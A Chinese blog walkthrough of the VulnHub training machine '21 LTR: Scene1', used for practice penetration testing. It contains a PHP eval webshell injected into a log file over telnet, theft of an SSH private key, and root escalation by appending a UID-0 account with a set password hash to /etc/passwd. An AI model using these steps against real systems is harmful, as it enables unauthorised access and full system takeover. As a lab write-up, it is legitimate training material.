vulnhub靶机:21 LTR: Scene1

最新推荐文章于 2024-09-14 11:39:50 发布
最新推荐文章于 2024-09-14 11:39:50 发布
阅读量271 收藏 6
点赞数 2
分类专栏: Vulnhub靶机 文章标签: 安全 web安全 网络安全 经验分享 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/142235748
版权

下载

下载地址:https://www.vulnhub.com/entry/21ltr-scene-1,3/

导入靶机

一直按默认的来,一直下一步

修改网卡

修改靶机和 kali 攻击机网络模式为仅主机模式

把仅主机模式的 IP 修改为 192.168.2.0

信息收集

主机发现

arp-scan -l

靶机 IP 是 192.168.2.120

端口扫描

nmap -p- 192.168.2.120

目录扫描

python3 dirsearch.py -u "192.168.2.120"

访问 web

查看页面源代码,发现账号和密码

尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件

ftp 192.168.2.120
logs								# 账号
zg]E-b0]+8:(58G			# 密码

下载下来

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

拼接到刚才扫描到的 logs 目录下,发现可以访问到日志文件 /logs/backup_log.php

上传一句话木马

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

telnet 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看一下敏感文件

因为有ssh服务,就读取一下密钥,把密钥下载下来拖进 kali 桌面

/media/USB_1/Stuff/Keys/id_rsa

赋予权限,然后ssh登录

chmod 600 id_rsa
ssh -i id_rsa hbeale@192.168.2.120

要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)

将一下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

提权

查看用户文件

cat /etc/passwd

另起一个终端

openssl passwd 123456

用 $1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3. 替换 root:x:0:0::/root:/bin/bash 中的 x

并新起一个名字 newt

newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash

把它写入/etc/passwd

echo 'newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash' >> /etc/passwd
cat /etc/passwd

提权成功

su newt
123456

燕雀安知鸿鹄之志哉.
关注
专栏目录
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 382
21LTR:Scene1靶机,打靶文章
Vulnhub靶机21 LTR: Scene1
最新发布
whoami
09-14 528
Vulnhub靶机21 LTR: Scene1实战
21LTR: Scene 1靶机
m0_61995767的博客
07-30 591
21LTR: Scene 1打靶记录
vulnhub】Hack the 21LTR: Scene 1 靶机
wbplife的博客
08-11 384
然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了。尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件/logs/backup_log.php。可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码。尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件。尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口。赋予权限,然后ssh登录。
Vulnhub靶机 21 LTR-Scene1(渗透测试详细)
2301_78721909的博客
07-30 385
Vulnhub靶机 21 LTR-Scene1详解(from wuhu)
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 432
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
21LTR:Scene1靶机详情
xiaoyanglailo的博客
09-14 134
靶机下载链接:一、靶机搭建将靶机调到仅主机模式我这边是自己做了一张仅主机的网卡靶机的IP显示。
Vulhub21LTR:Scene靶机详解
weixin_62457642的博客
09-13 405
靶机21LTR:Scene速刷
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 372
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4242
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1913
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
tang502的博客
09-24 1208
如果/proc/1/cgroup文件里面可以看到docker,以及docker的hash值。从页面exec()调用命令看出他是python,所以只要建立监听,用python反弹shell。反弹shell工具:https://forum.ywhack.com/shell.php。如果根目录下存在dockerenv,那么有极大的概率,我们是在docker环境中。查看ip,如果ip与网站ip不同,那么有极大的概率,我们是在docker环境中。发现为64的系统,可连接工具Venom,进行docks配置。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 553
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
【绿盟科技盟管家-注册/登录安全分析报告】
09-10 1282
绿盟科技应用互联网技术启动“盟管家”服务模式。通过全方位的数据集成平台,实现信息互通、化繁为简。已注册用户可实时了解Case处理进度及情况,帮助客户智能化判断紧急漏洞、设备版本,实时提供风险预警、升级提醒等。作为老牌安全头部科技公司, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
网络设备安全
weixin_49171105的博客
09-09 593
针对交换机、路由器潜在操作安全风险,提供权限分级机制,每种权限级别对应不同操作能力。远程访问路由器一般通过路由器自身提供的网络服务来实现 远程通信是信息是明文,为增强远程访问的安全性,应建立一个专用网络用语设备管理。审计方式:控制台日志审计、缓冲区日志审计、终端审计、SNMP traps、AAA审计、Syslog审计。交换机安全威胁:交换机是网络基础设备,负责网络通信数据包的交换传输。物理安全:物理安全是网络设备安全的基础,物理访问必须得到严格控制。认证协议:AAA网络安全管理机制(认证、授权、计费)
【中国国际航空-注册/登录安全分析报告】
09-07 1861
中国国际航空公司联合中国航空总公司和中国西南航空公司,成立了中国航空集团公司,作为航空领域的翘楚,依托国有资源,技术实力雄厚, 人才济济,在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
EAC认证—技术护照、安全论证和使用说明编制要求
liamjiangmingyao的博客
09-10 329
安全论证是海关联盟认证TR CU 010“机械和设备安全”和TR CU 032“超压设备安全”中的强制性文件,制造商(证书申请人)必须向认证机构提交该文件。3.机械和/或设备的使用说明以及使用机械和/或设备时应遵守的安全措施,包括调试、正确操作和维护、任何维修、定期诊断、测试、运输、包装和储存方法以及储存条件。5.在规定的使用寿命(规定的资源、寿命等)结束时,机器和/或设备必须停止使用,并且必须做出维修、处置、检查和重新使用的决定。10.调试、使用和回收阶段的安全相关信息的收集和分析要求。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值